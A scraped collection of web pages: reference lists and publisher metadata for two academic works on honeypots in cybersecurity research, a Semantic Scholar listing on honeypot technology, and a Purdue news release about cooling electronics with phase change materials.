Shafiq, M., Tian, Z., Bashir, A. K., Du, X. & Guizani, M. Corrauc: A malicious Bot–IoT traffic detection method in IoT network using machine-learning techniques. IEEE Internet Things J. 8 , 3242–3254. https://doi.org/10.1109/JIOT.2020.3002255 (2021).

Shafiq, M., Tian, Z., Bashir, A. K., Du, X. & Guizani, M. Iot malicious traffic identification using wrapper-based feature selection mechanisms. Comput. Secur. 94 , 101863. https://doi.org/10.1016/j.cose.2020.101863 (2020).

Baykara, M. & Das, R. A novel honeypot based security approach for real-time intrusion detection and prevention systems. J. Inf. Secur. Appl. 41 , 103–116. https://doi.org/10.1016/j.jisa.2018.06.004 (2018).

Artail, H., Safa, H., Sraj, M., Kuwatly, I. & Al-Masri, Z. A hybrid honeypot framework for improving intrusion detection systems in protecting organizational networks. Comput. Secur. 25 , 274–288. https://doi.org/10.1016/j.cose.2006.02.009 (2006).

Sharma, S. & Kaul, A. A survey on intrusion detection systems and honeypot based proactive security mechanisms in VANETS and VANET cloud. Vehic. Commun. 12 , 138–164 (2018).

Kambow, N. & Passi, L. K. Honeypots: The need of network security. Int. J. Comput. Sci. Inf. Technol. 5 , 6098–6101 (2014).

Github: Ghost-usb-Honeypot . Accessed 30 Sep 2021 (2021).

Franco, J., Aris, A., Canberk, B. & Uluagac, A. S. A survey of honeypots and honeynets for internet of things, industrial internet of things, and cyber-physical systems. IEEE Commun. Surv. Tutorials 23 , 2351–2383. https://doi.org/10.1109/COMST.2021.3106669 (2021).

Krishnaveni, S., Prabakaran, S. & Sivamohan, S. A survey on honeypot and honeynet systems for intrusion detection in cloud environment. J. Comput. Theor. Nanosci. 15 , 2949–2953 (2018).

Article   CAS   Google Scholar  

Fan, W., Du, Z., Fernández, D. & Villagrá, V. A. Enabling an anatomic view to investigate honeypot systems: A survey. IEEE Syst. J. 12 , 3906–3919. https://doi.org/10.1109/JSYST.2017.2762161 (2018).

Article   ADS   Google Scholar  

Wan, X., Guan, X., Wang, T., Bai, G. & Choi, B.-Y. Application deployment using microservice and docker containers: Framework and optimization. J. Netw. Comput. Appl. 119 , 97–109. https://doi.org/10.1016/j.jnca.2018.07.003 (2018).

Pahl, C., Jamshidi, P. & Zimmermann, O. Microservices and containers. in Software Engineering 2020 (Felderer, M., Hasselbring, W., Rabiser, R. & Jung, R. eds.). 115–116. https://doi.org/10.18420/SE2020_34 (Gesellschaft für Informatik e.V., 2020).

Liu, G. et al. Microservices: Architecture, container, and challenges. in 2020 IEEE 20th International Conference on Software Quality, Reliability and Security Companion (QRS-C) . 629–635. https://doi.org/10.1109/QRS-C51114.2020.00107 (2020).

Rashid, S. et al. Faking smart industry: Exploring cyber-threat landscape deploying cloud-based honeypot. Wirel. Netw. 1–15 (2022).

The Honeynet Project: Spam Honeypot with Intelligent Virtual Analyzer . Accessed 15 June 2022 (2022).

Liston, tom:labera . Accessed 13 June 2022 (2022).

Valicek, M., Schramm, G., Pirker, M. & Schrittwieser, S. Creation and integration of remote high interaction honeypots. in 2017 International Conference on Software Security and Assurance (ICSSA) . 50–55. https://doi.org/10.1109/ICSSA.2017.21 (2017).

Sun, Y. et al. Honeypot identification in softwarized industrial cyber-physical systems. IEEE Trans. Ind. Inform. 17 , 5542–5551 (2020).

Tsikerdekis, M., Zeadally, S., Schlesener, A. & Sklavos, N. Approaches for preventing honeypot detection and compromise. in 2018 Global Information Infrastructure and Networking Symposium (GIIS) . 1–6. https://doi.org/10.1109/GIIS.2018.8635603 (2018).

Sun, Y., Tian, Z., Li, M., Zhu, C. & Guizani, N. Automated attack and defense framework toward 5g security. IEEE Netw. 34 , 247–253 (2020).

Luo, C. et al. A novel web attack detection system for internet of things via ensemble classification. IEEE Trans. Ind. Inform. 17 , 5810–5818 (2020).

Eibes, M. Telekom Security . Accessed 23 Apr 2022 (2015).

Elastic: Filebeat Overview . Accessed 18 Dec 2022 (2022).

Chen, L., Liu, J., Xian, M. & Wang, H. Docker container log collection and analysis system based on elk. in 2020 International Conference on Computer Information and Big Data Applications (CIBDA) . 317–320. https://doi.org/10.1109/CIBDA50819.2020.00078 (2020).

Elasticsearch, B. Elasticsearch . https://www. elastic. co/pt/ . Accessed 12 Sep 2019 (2018).

Arcuri, A. Restful API automated test case generation with EvoMaster. ACM Trans. Softw. Eng. Methodol. (TOSEM) 28 , 1–37 (2019).

Cabral, W., Valli, C., Sikos, L. & Wakeling, S. Review and analysis of cowrie artefacts and their potential to be used deceptively. in 2019 International Conference on Computational Science and Computational Intelligence (CSCI) . 166–171. https://doi.org/10.1109/CSCI49370.2019.00035 (2019).

Github:cowrie/cowrie . Accessed 22 May 2022 (2022).

Kelly, C., Pitropakis, N., Mylonas, A., McKeown, S. & Buchanan, W. J. A comparative analysis of honeypots on different cloud platforms. Sensors 21 , 2433 (2021).

Ali, P. D. & Kumar, T. G. Malware capturing and detection in dionaea honeypot. in 2017 Innovations in Power and Advanced Computing Technologies (i-PACT) . 1–5. https://doi.org/10.1109/IPACT.2017.8245158 (2017).

Dinotools/dionaea . Accessed 21 Jan 2022 (2022).

Github:johnnykv/herlading . Accessed 24 Mar 2022 (2022).

Github:huuck/adbhoney . Accessed 27 Jan 2022 (2022).

Nist:-nvd . Accessed 27 May 2022 (2022).

The Honeynet Project . Accessed 27 May 2022 (2022).

Shah, N., Willick, D. & Mago, V. A framework for social media data analytics using Elasticsearch and Kibana. Wirel. Netw. 28 , 1–9 (2018).

Azarmi, B. Learning Kibana 5.0 (Packt Publishing Ltd, 2017).

Agrawal, N. & Tapaswi, S. Defense mechanisms against DDoS attacks in a cloud computing environment: State-of-the-art and research challenges. IEEE Commun. Surv. Tutorials 21 , 3769–3795. https://doi.org/10.1109/COMST.2019.2934468 (2019).

Batchu, R. K. & Seetha, H. A hybrid detection system for DDoS attacks based on deep sparse autoencoder and light gradient boost machine. J. Inf. Knowl. Manag. 12 , 2250071 (2022).

Dns Checker; whatismyipaddress.com . Accessed 20 Jul 2022 (2022).

Cirlig, G. Trinity-p2p Malware Over adb . Accessed 21 Jul 2022 (2020).

Baishya, R. C., Hoque, N. & Bhattacharyya, D. K. DDoS attack detection using unique source IP deviation. Int. J. Netw. Secur. 19 , 929–939 (2017).

Nam, K. & Kim, K. A study on SDN security enhancement using open source IDS/IPS Suricata. in 2018 International Conference on Information and Communication Technology Convergence (ICTC) . 1124–1126. https://doi.org/10.1109/ICTC.2018.8539455 (2018).

Nvd:cve . Accessed 25 May 2022 (2022).

Qiao, S., Hu, C., Guan, X. & Zou, J. Taming the flow table overflow in openflow switch. in Proceedings of the 2016 ACM SIGCOMM Conference . 591–592 (2016).

Batchu, R.K. & Seetha, H. On improving the performance of DDoS attack detection system. Microprocess. Microsyst. 104571 (2022).

Download references

Acknowledgements

The authors would like to thank the editors and reviewers. The authors would like to thank Dr. S. V. Kota Reddy, Vice Chancellor & Dr. Jagadish Chandra Mudiganti, Registrar, VIT-AP University for their great support. A Special thanks to Dr. Hari Seetha, Director, Center of Excellance, Artificial and Robotics (AIR) and Dr. Ganesh Reddy Karri, Coordinator, Center of Excellance, Cyber Security, VIT-AP University. A heartful thanks to the team members of AIR and Cyber Security. A special mention to Tharshith Gaud Jadapalli, team member, AIR for his continuous support.

Author information

These authors contributed equally: V. S. Devi Priya and S. Sibi Chakkaravarthy.

Authors and Affiliations

Centre of Excellence, Artificial Intelligence and Robotics (AIR); Centre of Excellence, Cyber Security and School of Computer Science and Engineering, VIT-AP University, Amaravati, Andhra Pradesh, 522237, India

V. S. Devi Priya & S. Sibi Chakkaravarthy

You can also search for this author in PubMed   Google Scholar

Contributions

D.P.: Concept, design, analysis, writing-review, and editing. S.C.: Concept, design, analysis, writing-review, and editing. All authors reviewed the manuscript.

Corresponding author

Correspondence to S. Sibi Chakkaravarthy .

Ethics declarations

Competing interests.

The authors declare no competing interests.

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/ .

Reprints and permissions

About this article

Cite this article.

Priya, V.S.D., Chakkaravarthy, S.S. Containerized cloud-based honeypot deception for tracking attackers. Sci Rep 13 , 1437 (2023). https://doi.org/10.1038/s41598-023-28613-0

Download citation

Received : 24 October 2022

Accepted : 20 January 2023

Published : 25 January 2023

DOI : https://doi.org/10.1038/s41598-023-28613-0

Share this article

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

This article is cited by

Networked industrial control device asset identification method based on improved decision tree.

• Yushan Fang

Journal of Network and Systems Management (2024)

Secure container Orchestration: A framework for detecting and mitigating Orchestrator - level vulnerabilities

• V. Mahavaishnavi
• R. Saminathan
• R. Prithviraj

Multimedia Tools and Applications (2024)

By submitting a comment you agree to abide by our Terms and Community Guidelines . If you find something abusive or that does not comply with our terms or guidelines please flag it as inappropriate.

Quick links

• Explore articles by subject
• Guide to authors
• Editorial policies

Sign up for the Nature Briefing: AI and Robotics newsletter — what matters in AI and robotics research, free to your inbox weekly.

We apologize for the inconvenience...

To ensure we keep this website safe, please can you confirm you are a human by ticking the box below.

If you are unable to complete the above request please contact us using the below link, providing a screenshot of your experience.

https://ioppublishing.org/contacts/

Honeypots for Cybercrime Research

• First Online: 30 July 2021

Cite this chapter

• Robert C. Perkins 3 &
• C. Jordan Howell 3 , 4  

1564 Accesses

5 Citations

Honeypots are a type of cybersecurity tool designed with the general purpose of being attacked and compromised by cyberthreats. They became widely popularized throughout the 1990s by computer scientists due to their multi-functional capabilities. As a result, a wide variety of honeypots have been introduced to handle different cybersecurity tasks. Only recently have social scientists begun using them in cybercrime research to test criminological theories and shed light on deviant human behavior in cyberspace. However, arguments have been made for, and against, the utilization of honeypots in this line of research. In this chapter, what constitutes honeypot research in the context of both computer and social science is described. Finally, the chapter concludes itself with advice and suggestions for scholars interested in using honeypots in their own research endeavors.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Subscribe and save.

• Get 10 units per month
• Download Article/Chapter or eBook
• 1 Unit = 1 Article or 1 Chapter
• Cancel anytime
• Available as PDF
• Read on any device
• Instant download
• Own it forever
• Available as EPUB and PDF
• Compact, lightweight edition
• Dispatched in 3 to 5 business days
• Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Similar content being viewed by others

Defining Cybercrime

Global Voices in Hacking (Multinational Views)

Akers, R. L. (2011). Social learning and social structure: A general theory of crime and deviance . Transaction Publishers.

Google Scholar  

Alata, É., Alberdi, I., Nicomette, V., Owezarski, P., & Kaâniche, M. (2008). Internet attacks monitoring with dynamic connection redirection mechanisms. Journal in Computer Virology, 4 (2), 127–136.

Article   Google Scholar  

Alata, E., Nicomette, V., Kaâniche, M., Dacier, M., & Herrb, M. (2006). Lessons learned from the deployment of a high-interaction honeypot. In 2006 Sixth European Dependable Computing Conference (pp. 39–46). IEEE.

Alberdi, I., Philippe, É., Vincent, O., & Kaâniche, N. M. (2007). Shark: Spy honeypot with advanced redirection kit. In Proceedings of the IEEE Workshop on Monitoring, Attack detEction and Mitigation (pp. 47–52).

Anagnostakis, K. G., Sidiroglou, S., Akritidis, P., Xinidis, K., Markatos, E., & Keromytis, A. D. (2005). Detecting targeted attacks using shadow honeypots .

Baecher, P., Holz, T., Kötter, M., & Wicherski, G (2016). The Malware Collection Tool (mwcollect) . Available at: http://www.mwcollect.org/ .

Bailey, M., Cooke, E., Watson, D., Jahanian, F., & Provos, N. (2004). A hybrid honeypot architecture for scalable network monitoring . Univ. Michigan, Ann Arbor, MI, USA, Tech. Rep. CSE-TR-499–04.

Bossler, A. M. (2017). Need for debate on the implications of honeypot data for restrictive deterrence policies in cyberspace. Criminology and Public Policy, 16, 679.

Bringer, M. L., Chelmecki, C. A., & Fujinoki, H. (2012). A survey: Recent advances and future trends in honeypot research. International Journal of Computer Network and Information Security, 4 (10), 63.

Buller, D. B., & Burgoon, J. K. (1996). Interpersonal deception theory. Communication Theory, 6 (3), 203–242.

Cheswick, B. (1992). An evening with Berferd in which a cracker is lured, endured, and studied. In Proceedings of Winter USENIX Conference (pp. 20–24). San Francisco.

Clarke, R. V. (1980). Situational crime prevention: Theory and practice. British Journal of Criminology, 20, 136.

Cohen, F. (1998). The RISKS Digest (Vol. 19, Issue 62). Available at: http://catless.ncl.ac.uk/Risks/19.62 .

Cohen, L. E., & Felson, M. (1979). Social change and crime rate trends: A routine activity approach. American sociological review , 588–608.

Cui, W., Paxson, V., & Weaver, N. (2006). GQ: Realizing a system to catch worms in a quarter million places . Technical Report TR-06–004, ICSI.

Deutsche Telekom. (2021). Available at: https://www.telekom.com/en .

Do Carmo, R., Nassar, M., & Festor, O. (2011). Artemisa: An open-source honeypot back-end to support security in VoIP domains. In 12th IFIP/IEEE International Symposium on Integrated Network Management (IM 2011) and Workshops (pp. 361–368). IEEE.

Even, L. R. (2000). Honey pot systems explained . Available at: https://www.sans.org/security-resources/idfaq/honeypot3.php .

Fan, W., Du, Z., Fernández, D., & Villagrá, V. A. (2017). Enabling an anatomic view to investigate honeypot systems: A survey. IEEE Systems Journal, 12 (4), 3906–3919.

Gibbs, J. P. (1975). Crime, punishment, and deterrence . Elsevier.

Grégio, A., Santos, R., & Montes, A. (2007). Evaluation of data mining techniques for suspicious network activity classification using honeypots data. In Data Mining, Intrusion Detection, Information Assurance, and Data Networks Security 2007 (Vol. 6570, p. 657006). International Society for Optics and Photonics.

Heartfield, R., Loukas, G., Budimir, S., Bezemskij, A., Fontaine, J. R., Filippoupolitis, A., & Roesch, E. (2018). A taxonomy of cyber-physical threats and impact in the smart home. Computers and Security, 78, 398–428.

Hecker, C., Nance, K. L., & Hay, B. (2006). Dynamic honeypot construction. In Proceedings of the 10th Colloquium for Information Systems Security Education (Vol. 102). MD, USA.

Holt, T. J. (2017). On the value of honeypots to produce policy recommendations. Criminology and Public Policy, 16, 737.

Holz, T., & Raynal, F. (2005). Detecting honeypots and other suspicious environments. In Proceedings from the Sixth Annual IEEE SMC Information Assurance Workshop (pp. 29–36). IEEE.

Honeynet Project. (2020). Available at: https://www.honeynet.org .

Howell, C. J., & Burruss, G. W. (2020). Datasets for analysis of cybercrime. In The Palgrave handbook of international cybercrime and cyberdeviance (pp. 207–219).

Howell, C. J., Maimon, D., Cochran, J. K., Jones, H. M., & Powers, R. A. (2017). System trespasser behavior after exposure to warning messages at a Chinese computer network: An examination. International Journal of Cyber Criminology, 11 (1), 63–77.

Hsu, C. L., & Lin, J. C. C. (2016). An empirical examination of consumer adoption of Internet of Things services: Network externalities and concern for information privacy perspectives. Computers in Human Behavior, 62, 516–527.

Jacobs, B. A. (1993). Undercover deception clues: A case of restrictive deterrence. Criminology, 31 (2), 281–299.

Jiang, X., & Xu, D. (2004). Collapsar: A VM-based architecture for network attack detention center. In USENIX Security Symposium (pp. 15–28).

Kaaniche, M., Deswarte, Y., Alata, E., Dacier, M., & Nicomette, V. (2007). Empirical analysis and statistical modeling of attack processes based on honeypots . arXiv preprint. arXiv:0704.0861 .

Kennedy, J., Holt, T., & Cheng, B. (2019). Automotive cybersecurity: Assessing a new platform for cybercrime and malicious hacking. Journal of Crime and Justice, 42 (5), 632–645.

Khattab, S. M., Sangpachatanaruk, C., Mossé, D., Melhem, R., & Znati, T. (2004). Roaming honeypots for mitigating service-level denial-of-service attacks. In 24th International Conference on Distributed Computing Systems, 2004. Proceedings (pp. 328–337). IEE.

Leita, C., & Dacier, M. (2008). SGNET: a worldwide deployable framework to support the analysis of malware threat models. In 2008 Seventh European Dependable Computing Conference (pp. 99–109). IEEE.

Leita, C., Pham, V. H., Thonnard, O., Ramirez-Silva, E., Pouget, F., Kirda, E., & Dacier, M. (2008). The leurre.com project: Collecting Internet threats information using a worldwide distributed honeynet. In 2008 WOMBAT Workshop on Information Security Threats Data Collection and Sharing (pp. 40–57). IEEE.

Lengyel, T. K., Neumann, J., Maresca, S., & Kiayias, A. (2013). Towards hybrid honeynets via virtual machine introspection and cloning. In International Conference on Network and System Security (pp. 164–177). Springer, Berlin, Heidelberg.

Li, S., & Schmitz, R. (2009). A novel anti-phishing framework based on honeypots (pp. 1–13). IEEE.

Maimon, D., Alper, M., Sobesto, B., & Cukier, M. (2014). Restrictive deterrent effects of a warning banner in an attacked computer system. Criminology, 52 (1), 33–59.

Maimon, D., Becker, M., Patil, S., & Katz, J. (2017). Self-protective behaviors over public WiFi networks. In The {LASER} Workshop: Learning from Authoritative Security Experiment Results ({LASER} (pp. 69–76).

Maimon, D., Howell, C. J., Jacques, S., & Perkins, R. C. (2020a). Situational awareness and public Wi-Fi users’ self-protective behaviors. Security Journal (online first).

Maimon, D., Howell, C. J., Moloney, M., & Park, Y. S. (2020b). An examination of email fraudsters’ modus operandi. Crime and Delinquency (online first).

Maimon, D., & Louderback, E. R. (2019). Cyber-dependent crimes: an interdisciplinary review. Annual Review of Criminology, 2 , 191–216.

Maimon, D., Santos, M., & Park, Y. (2019a). Online deception and situations conducive to the progression of non-payment fraud. Journal of Crime and Justice, 42 (5), 516–535.

Maimon, D., Testa, A., Sobesto, B., Cukier, M., & Ren, W. (2019b). Predictably deterrable? The case of system trespassers. In International Conference on Security, Privacy and Anonymity in Computation, Communication and Storage (pp. 317–330). Springer.

Chapter   Google Scholar  

Maimon, D., Wilson, T., Ren, W., & Berenblum, T. (2015). On the relevance of spatial and temporal dimensions in assessing computer susceptibility to system trespassing incidents. British Journal of Criminology, 55 (3), 615–634.

Markatos, E., & Anagnostakis, K. (2008). Noah: A european network of affined honeypots for cyber-attack tracking and alerting. The Parliament Magazine , p. 262.

McGrew, R. (2006). Experiences with honeypot systems: Development, deployment, and analysis. In Proceedings of the 39th Annual Hawaii International Conference on System Sciences (HICSS’06) (Vol. 9, pp. 220a–220a). IEEE.

Nawrocki, M., Wählisch, M., Schmidt, T. C., Keil, C., & Schönfelder, J. (2016). A survey on honeypot software and data analysis. arXiv preprint arXiv:1608.06249 .

Newman, G. R., & Socia, K. (2007). Sting operations . US Department of Justice, Office of Community Oriented Policing Services.

Oluwatosin, H. S. (2014). Client-server model. IOSR Journal of Computer Engineering (IOSR-JCE) , 16 (1), 67.

Oosterhof, M. (2015). Cowrie—Active kippo fork .

Pa, Y. M. P., Suzuki, S., Yoshioka, K., Matsumoto, T., Kasama, T., & Rossow, C. (2015). IoTPOT: Analysing the rise of IoT compromises. In 9th {USENIX} Workshop on Offensive Technologies ({WOOT} 15) .

Patton, M., Gross, E., Chinn, R., Forbis, S., Walker, L., & Chen, H. (2014). Uninvited connections: A study of vulnerable devices on the Internet of Things (IoT). In 2014 IEEE Joint Intelligence and Security Informatics Conference (pp. 232–235). IEEE.

Podhradsky, A., Casey, C., & Ceretti, P. (2012). The Bluetooth honeypot project: Measuring and managing bluetooth risks in the workplace. International Journal of Interdisciplinary Telecommunications and Networking (IJITN), 4 (3), 1–22.

Poeplau, S., & Gassen, J. (2012). A honeypot for arbitrary malware on USB storage devices. In 2012 7th International Conference on Risks and Security of Internet and Systems (CRiSIS) (pp. 1–8). IEEE.

Portokalidis, G., Slowinska, A., & Bos, H. (2006). Argos: An emulator for fingerprinting zero-day attacks for advertised honeypots with automatic signature generation. ACM SIGOPS Operating Systems Review, 40 (4), 15–27.

Pouget, F., & Dacier, M. (2004). Honeypot-based forensics. In AusCERT Asia Pacific Information Technology Security Conference.

Provos, N. (2004). A virtual honeypot framework. In USENIX Security Symposium (Vol. 173, No. 2004, pp. 1–14).

Provos, N., & Holz, T. (2007). Virtual honeypots: From botnet tracking to intrusion detection . Pearson Education.

Raynal, F., Berthier, Y., Biondi, P., & Kaminsky, D. (2004). Honeypot forensics part 1: Analyzing the network. IEEE Security and Privacy, 2 (4), 72–78.

Rege, A. (2013). Factors Impacting Attacker Decision-Making in Power Grid Cyber Attacks. In International Conference on Critical Infrastructure Protection (pp. 125–138). Springer, Berlin, Heidelberg.

Rist, L. (2009). Glastopf project. The Honeynet Project .

Rist, L., Vestergaard, J., Haslinger, D., Pasquale, A., & Smith, J. (2013). Conpot ics/SCADA honeypot . Honeynet Project ( conpot.org ).

Roesch, M. (1999). Snort: Lightweight intrusion detection for networks. In Lisa (Vol. 99, No. 1, pp. 229–238).

Ryan, J. (2010). A history of the Internet and the digital future . Reaktion Books.

Schindler, S., Schnor, B., & Scheffler, T. (2015). Hyhoneydv6: A hybrid honeypot architecture for IPV6 networks. International Journal of Intelligent Computing Research, 6 .

Schneier, B. (2015). Secrets and lies: Digital security in a networked world . Wiley.

Book   Google Scholar  

Seifert, C., Welch, I., & Komisarczuk, P. (2007). Honeyc-the low-interaction client honeypot. In Proceedings of the 2007 NZCSRCS (Vol. 6). Waikato University, Hamilton, New Zealand.

Spitzner, L. (2001). The value of honeypots, part one: Definitions and values of honeypots. Security Focus .

Spitzner, L. (2002). Honeypots: Tracking hackers Addison Wesley Professional .

Spitzner, L. (2003). Specter: A commercial honeypot solution for windows. Acesso em , 26 (8).

Spitzner, L. (2005). Know your enemy: Honeynets. Honeynet Project .

Spitzner, L., & Roesch, M. (2001). The value of honeypots, part one: Definitions and values of honeypots .

Stanislav, M., & Beardsley, T. (2015). Hacking IoT: A case study on baby monitor exposures and vulnerabilities. Rapid7 Report .

Steinmetz, K. F. (2017). Ruminations on warning banners, deterrence, and system intrusion research. Criminology & Pub. Pol’y, 16 , 725.

Stoll, C. (1990). The cuckoo’s egg: Tracking a spy through the maze of computer espionage .

Testa, A., Maimon, D., Sobesto, B., & Cukier, M. (2017). Illegal roaming and file manipulation on target computers: Assessing the effect of sanction threats on system trespassers’ online behaviors. Criminology and Public Policy, 16 (3), 689–726.

Trivedi, A. J., Judge, P., & Krasser, S. (2007). Analyzing network and content characteristics of spim using honeypots. In SRUTI .

Udhani, S., Withers, A., & Bashir, M. (2019). Human vs bots: Detecting human attacks in a honeypot environment. In 2019 7th International Symposium on Digital Forensics and Security (ISDFS) (pp. 1–6). IEEE.

Vetterl, A. (2020). Honeypots in the age of universal attacks and the Internet of Things . Doctoral dissertation, University of Cambridge.

Vlajic, N., & Zhou, D. (2018). IoT as a land of opportunity for DDoS hackers. Computer, 51 (7), 26–34.

Wilson, T., Maimon, D., Sobesto, B., & Cukier, M. (2015). The effect of a surveillance banner in an attacked computer system: Additional evidence for the relevance of restrictive deterrence in cyberspace. Journal of Research in Crime and Delinquency, 52 (6), 829–855.

Yaqoob, I., Ahmed, E., ur Rehman, M. H., Ahmed, A. I. A., Al-garadi, M. A., Imran, M., & Guizani, M. (2017). The rise of ransomware and emerging security challenges in the Internet of Things. Computer Networks, 129, 444–458.

Yegneswaran, V., Barford, P., & Paxson, V. (2005). Using honeynets for internet situational awareness. In Proceedings of the Fourth Workshop on Hot Topics in Networks (HotNets IV) (pp. 17–22).

Download references

Author information

Authors and affiliations.

Department of Criminal Justice and Criminology, Georgia State University, Atlanta, Georgia, United States of America

Robert C. Perkins & C. Jordan Howell

Department of Criminal Justice, The University of Texas at El Paso, El Paso, Texas, USA

C. Jordan Howell

You can also search for this author in PubMed   Google Scholar

Corresponding author

Correspondence to Robert C. Perkins .

Editor information

Editors and affiliations.

Department of Sociology, Social Policy and Criminology, University of Southampton, Southampton, UK

Anita Lavorgna

School of Criminal Justice, Michigan State University, East Lansing, MI, USA

Thomas J. Holt

Rights and permissions

Reprints and permissions

Copyright information

© 2021 The Author(s), under exclusive license to Springer Nature Switzerland AG

About this chapter

Perkins, R.C., Howell, C.J. (2021). Honeypots for Cybercrime Research. In: Lavorgna, A., Holt, T.J. (eds) Researching Cybercrimes. Palgrave Macmillan, Cham. https://doi.org/10.1007/978-3-030-74837-1_12

Download citation

DOI : https://doi.org/10.1007/978-3-030-74837-1_12

Published : 30 July 2021

Publisher Name : Palgrave Macmillan, Cham

Print ISBN : 978-3-030-74836-4

Online ISBN : 978-3-030-74837-1

eBook Packages : Law and Criminology Law and Criminology (R0)

Share this chapter

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

• Publish with us

Policies and ethics

• Find a journal
• Track your research

• DOI: 10.3724/sp.j.1001.2013.04369
• Corpus ID: 63852269

Honeypot Technology Research and Application

• Published 2013
• Computer Science, Engineering
• Journal of Software

Tables from this paper

8 Citations

Design and implementation of modular honeynet system based on sdn, study on network security proactive defense model based on honey pot technology, s7commtrace: a high interactive honeypot for industrial control system based on s7 protocol, web attack detection based on honeypots and logistic regression algorithm, sdn virtual honeynet for network attack information acquisition, icstrace: a malicious ip traceback model for attacking data of industrial control system, an efficient multiplex network model for effective honeypot roaming against ddos attacks, malicious hidden redirect attack web page detection based on css features, 84 references, honeypot: a supplemented active defense system for network security, honeypot detection in advanced botnet attacks, honeypot-aware advanced botnet construction and maintenance, a hybrid honeypot framework for improving intrusion detection systems in protecting organizational networks, a dynamic honeypot design for intrusion detection, towards an invisible honeypot monitoring system, study and design of the proactive security protecting measure－honeynet, detecting targeted attacks using shadow honeypots, experiences with the noah honeynet testbed to detect new internet worms, honeypots: tracking hackers, related papers.

Showing 1 through 3 of 0 Related Papers

• Faculty and Staff News
• Media Resources
• Purdue News Weekly
• Research Excellence
• Purdue Computes
• Daniels School of Business
• Purdue University in Indianapolis
• The Persistent Pursuit
• Purdue News on Youtube
• Purdue in the News
• Purdue University Events

New research focuses on keeping today’s hottest electronics cool for users at nanoscale level

Thermal management works to absorb, dissipate heat created by chips in handheld phones and electric vehicles

Amy Marconnet, professor of mechanical engineering, uses an infrared camera in her lab at Birck Nanotechnology Center at Purdue. Her research looks into new methods to manage and reduce the heat produced inside many of today’s electronics. (Purdue University photo/Greta Bell)

WEST LAFAYETTE, Ind. — Keeping today’s electronics cool isn’t as easy as running a fan installed at the rear of a desktop computer. Using anything from a smartphone to an electric vehicle results in some manner of heat production that eventually leads to the deterioration of the device.

Amy Marconnet, professor of mechanical engineering at Purdue University, is researching today’s wide range of technology to develop electronics cooling and thermal management techniques focusing on reducing the heat that’s produced, potentially resulting in improved device power and usage.

Electronics have a narrow temperature range where they can function efficiently. In an ever-evolving era of technology, there are a variety of ways to keep devices cool, even at a nanoscale level.

“On the semiconductor side, we’re mainly looking at improving thermal management to let electronics run at higher powers,” Marconnet said. “With wearable electronics, there’s tighter temperature controls required because it’s directly in contact with people at all times or when it’s in use and getting hot.”

That requirement has resulted in researching materials that can better transfer the heat in a system away from where it is building up without adding additional weight or manufacturing costs to the device.

Marconnet said phase change materials are one option her research is delving into. The materials provide thermal management by absorbing or releasing heat during the transition between melting or solidifying, depending upon the conditions. They also are being researched for the power electronics in electric vehicles.

“So, you can have the materials be melting while you’re, say, using your VR (virtual reality) goggles,” she said. “And then when you’re recharging your goggles or overnight, they will solidify, and you can use the device with higher intensity the next day.”

By melting, the phase change materials absorb the heat being produced, while solidifying again releases the heat. Marconnet recently researched using a metallic alloy as a phase change material within a chip to keep the system compact, yet effective. This work was spearheaded by Marconnet’s graduate student Meghavin Bhatasana.

Marconnet’s work receives funding from a consortium of companies as part of the Cooling Technologies Research Center at Purdue. She has published previous papers on thermal greases, a pastelike material that is put between a silicon chip and the heat-spreading components in the system.

Thermal greases eventually are “pumped out” of the area between the chips and other components, causing a device like a computer to drop in performance.

“We’re trying to figure out a fast test method right now for identifying which materials will perform well and which will perform poorly without having to wait for a year or more of an actual use of the system,” Marconnet said.

Thermal management also examines the part batteries play in heat buildup, especially as the demand increases for faster charges, particularly in electric vehicles.

Marconnet compared heat buildup from charging a device battery to the light from an incandescent light bulb. While you get useful light from the bulb, it also gets hot. When charging a battery, you also get useful power, but heat is generated by the battery’s electrochemical reactions. So, while some of the power is being used for the chemical reactions that charge the battery, another portion of the power just gets wasted as heat in the device.

Marconnet and Xiulin Ruan , a professor in the School of Mechanical Engineering , already have worked to extend the life of devices by creating a compressible foam that can spread out heat building up as well as offer insulation against colder temperatures. The Purdue Innovates Office of Technology Commercialization has filed a patent application for it.

Two new papers regarding Marconnet’s work on phase change materials have been submitted and are under review.

Purdue is a national leader in research and education involving microelectronics materials, devices, chip design, tool development, manufacturing, packaging and sustainability, spanning the semiconductor ecosystem in software and hardware with long-standing faculty excellence. Strategic initiatives — such as the first comprehensive, large-scale Semiconductor Degrees Program , announced by Purdue in 2022 — are intended to prepare the next generation of semiconductor industry workers, a cornerstone for advancing the field.

About Purdue University

Purdue University is a public research institution demonstrating excellence at scale. Ranked among top 10 public universities and with two colleges in the top four in the United States, Purdue discovers and disseminates knowledge with a quality and at a scale second to none. More than 105,000 students study at Purdue across modalities and locations, including nearly 50,000 in person on the West Lafayette campus. Committed to affordability and accessibility, Purdue’s main campus has frozen tuition 13 years in a row. See how Purdue never stops in the persistent pursuit of the next giant leap — including its first comprehensive urban campus in Indianapolis, the Mitch Daniels School of Business, Purdue Computes and the One Health initiative — at https://www.purdue.edu/president/strategic-initiatives .

Experimental Investigation of Composite Phase Change Material Heat Sinks for Enhanced Passive Thermal Management ASME Journal of Heat and Mass Transfer DOI: https://doi.org/10.1115/1.4048620

Machine-learning assisted optimization strategies for phase change materials embedded within electronic packages Applied Thermal Engineering DOI: https://doi.org/10.1016/j.applthermaleng.2021.117384

